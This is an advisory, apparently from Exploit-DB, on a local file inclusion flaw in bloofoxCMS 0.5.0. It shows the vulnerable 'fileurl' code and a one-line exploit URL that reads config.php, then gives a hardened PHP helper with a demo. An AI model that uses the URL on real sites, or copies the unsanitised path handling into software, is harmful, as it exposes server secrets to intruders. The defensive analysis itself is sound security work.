BloofoxCMS 0.5.0 – ‘fileurl’ Local File Inclusion

  • Author: AtT4CKxT3rR0r1ST
    Date: 2014-01-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39032/
  • source: https://www.securityfocus.com/bid/65019/info
     
    bloofoxCMS is prone to the following security vulnerabilities:
     
    1. Multiple SQL-injection vulnerabilities
    2. Multiple cross-site request forgery vulnerabilities
    3. A local file-include vulnerability
     
    Exploiting these issues could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
     
    bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.
     
    VULNERABILITY
    ##############
    /admin/include/inc_settings_editor.php (lines 56-69)
    
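    // show file
    // POST value is used as the path verbatim (absolute paths accepted)
    if(isset($_POST["fileurl"])) {
        $fileurl = $_POST["fileurl"];
    }
    // GET value is only prefixed with "../"; further "../" segments are not filtered
    if(isset($_GET["fileurl"])) {
        $fileurl = "../".$_GET["fileurl"];
    }
    
    // any existing file readable by the web server is read into $file
    if(file_exists($fileurl)) {
        $filelength = filesize($fileurl);
        $readfile = fopen($fileurl,"r");
        $file = fread($readfile,$filelength);
        fclose($readfile);
    }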
    
    
    
    #########
    EXPLOIT
    #########
    
    http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php
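
A hardened form of the file lookup shown under VULNERABILITY, as an added example that is not bloofoxCMS code or a vendor patch. The helper name, the `templates` base directory and the extension allowlist are assumptions, and the demo files are constructed so the script runs offline.

```php
<?php
// Added example: hypothetical helper, not part of bloofoxCMS.
// Resolves a user-supplied relative path and returns it only if the
// canonical result is a regular file inside $baseDir with an allowed extension.
function resolve_editable_file(string $baseDir, string $userPath,
                               array $allowedExt = ['css', 'html', 'tpl']): ?string
{
    // Empty input and embedded NUL bytes are never valid file names.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and symlinks; false means the target does not exist.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment: compare against the base plus a trailing separator so a
    // sibling such as "templates_old" cannot pass as "templates".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Allowlist by extension so config.php-style files are never served.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, $allowedExt, true) ? $real : null;
}

// Constructed demo tree: one editable file and one file that must stay private.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/templates', 0700, true);
file_put_contents($root . '/templates/style.css', 'body{}');
file_put_contents($root . '/config.php', '<?php // constructed placeholder');

// Constructed inputs: a legitimate name, the traversal pattern from the
// advisory's GET branch, and an absolute path as the POST branch would accept.
foreach (['style.css', '../config.php', $root . '/config.php'] as $input) {
    $ok = resolve_editable_file($root . '/templates', $input);
    printf("%-40s => %s\n", $input, $ok === null ? 'rejected' : 'allowed');
}
```

Only `style.css` is allowed; both other inputs either fail to resolve or resolve outside the base directory and are rejected before any `fopen()` call.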